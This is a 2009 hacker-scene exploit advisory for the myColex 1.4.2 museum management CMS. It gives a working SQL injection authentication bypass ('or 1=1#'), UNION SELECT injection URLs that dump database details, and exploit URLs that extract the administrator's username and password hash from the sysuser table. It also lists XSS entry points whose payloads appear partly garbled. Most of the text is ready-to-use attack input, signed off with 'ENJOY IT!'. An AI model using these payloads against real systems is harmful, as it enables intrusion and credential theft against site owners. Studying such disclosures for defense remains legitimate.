|
-------------------------------------------------------=0D
MULTIPLE REMOTE VULNERABILITIES --my-colex 1.4.2-->=0D
-------------------------------------------------------=0D
=0D
CMS INFORMATION:=0D
=0D
-->WEB: http://www.collector.ch/drupal5/index.php=0D
-->DOWNLOAD: http://www.collector.ch/drupal5/?q=node/11=0D
-->DEMO: http://www.collector.ch/drupal5/?q=node/10=0D
-->CATEGORY: Management=0D
-->DESCRIPTION: myColex is a complete museum management and collection documentation=0D
system with longterm archiving capabilities based on Apache/PHP and mySQL...=0D
-->RELEASED: 2009-03-24=0D
=0D
CMS VULNERABILITY:=0D
=0D
-->TESTED ON: firefox 3=0D
-->DORK: N/A=0D
-->CATEGORY: AUTH BYPASS/ SQL INJECTION / XSS=0D
-->AFFECT VERSION: 1.4.2 (maybe <= ?)=0D
-->Discovered Bug date: 2009-05-06=0D
-->Reported Bug date: 2009-05-06=0D
-->Fixed bug date: 2009-05-07=0D
-->Info patch: http://www.collector.ch/drupal5/?q=forum/15=0D
-->Author: YEnH4ckEr=0D
-->mail: y3nh4ck3r[at]gmail[dot]com=0D
-->WEB/BLOG: N/A=0D
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.=0D
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)=0D
=0D
=0D
=0D
#################=0D
/////////////////=0D
=0D
INTRODUCTION:=0D
=0D
/////////////////=0D
#################=0D
=0D
=0D
This app is completely vulnerable to sql code injection.=0D
=0D
Except auth bypass we can not exploit sql injection without a register user.=0D
=0D
=0D
#########################=0D
////////////////////////=0D
=0D
AUTH BYPASS (SQLi):=0D
=0D
////////////////////////=0D
#########################=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>=0D
=0D
=0D
----------=0D
EXPLOIT:=0D
----------=0D
=0D
Name=' or 1=1#=0D
=0D
password=123456 (over six characters)=0D
=0D
Then, going to http://[HOST]/[HOME_PATH]/modules/admuser.php?Modus=Find=0D
=0D
We got admin credentials...=0D
=0D
Password is encrypted with MySQLSHA-1.=0D
=0D
=0D
#########################=0D
////////////////////////=0D
=0D
SQL INJECTION (SQLi):=0D
=0D
////////////////////////=0D
#########################=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: Be a register user +++++++++++++++++--------->>>>=0D
=0D
<<<<---------++++++++++++++ Condition: magic quotes = ON/OFF +++++++++++++++++--------->>>>=0D
=0D
=0D
------------------=0D
PROOF OF CONCEPT:=0D
------------------=0D
=0D
=0D
Some examples:=0D
=0D
http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,version(),database(),user(),version()%23=0D
=0D
http://[HOST]/[HOME_PATH]/modules/medium.php?Modus=Detail&ID=23+and+0+UNION+ALL+SELECT+1,version(),database(),version(),user(),database(),7/*=0D
=0D
http://[HOST]/[HOME_PATH]/modules/person.php?Modus=Detail&ID=2+AND+0+UNION+ALL+SELECT+1,2,3,4,version(),6,user(),version(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*=0D
=0D
http://[HOST]/[HOME_PATH]/modules/schlagwort.php?Modus=Detail&ID=1+AND+0+UNION+ALL+SELECT+1,version(),database(),current_user(),user(),6/*=0D
=0D
There are more...=0D
=0D
Return: user, version, ...=0D
=0D
=0D
----------=0D
EXPLOITS:=0D
----------=0D
=0D
=0D
http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,SuUser,SuEmail,SuPwd,SuSysAut+FROM+sysuser+WHERE+SuID=1%23=0D
=0D
http://[HOST]/[HOME_PATH]/modules/medium.php?Modus=Detail&ID=23+and+0+UNION+ALL+SELECT+1,2,3,4,SuUser,SuPwd,6+FROM+sysuser+WHERE+SuID=1/*=0D
=0D
Return: username/password (id=1)=0D
=0D
=0D
###########################=0D
///////////////////////////=0D
=0D
CROSS SITE SCRIPTING (XSS):=0D
=0D
///////////////////////////=0D
###########################=0D
=0D
=0D
XSS is possible where you like :P=0D
=0D
Some examples:=0D
=0D
=0D
=0D">http://[HOST]/[HOME_PATH]/modules/kalender.php?month=5&year=2009">=0D
=0D
&Order=ErAnfangsdatum=0D">http://[HOST]/[HOME_PATH]/modules/ereignis.php?Modus=List&Page=1">&Order=ErAnfangsdatum=0D
=0D
=0D">http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Search&Kontext=objekt">=0D
=0D
http://[HOST]/[HOME_PATH]/modules/image.php?image==0D
=0D
=0D
Of course there are more...=0D
=0D
=0D
=0D
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!=0D
=0D
=0D
#######################################################################=0D
#######################################################################=0D
##*******************************************************************##=0D
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##=0D
##*******************************************************************##=0D
##-------------------------------------------------------------------##=0D
##*******************************************************************##=0D
## GREETZ TO: SPANISH H4ck3Rs community! ##=0D
##*******************************************************************##=0D
#######################################################################=0D
#######################################################################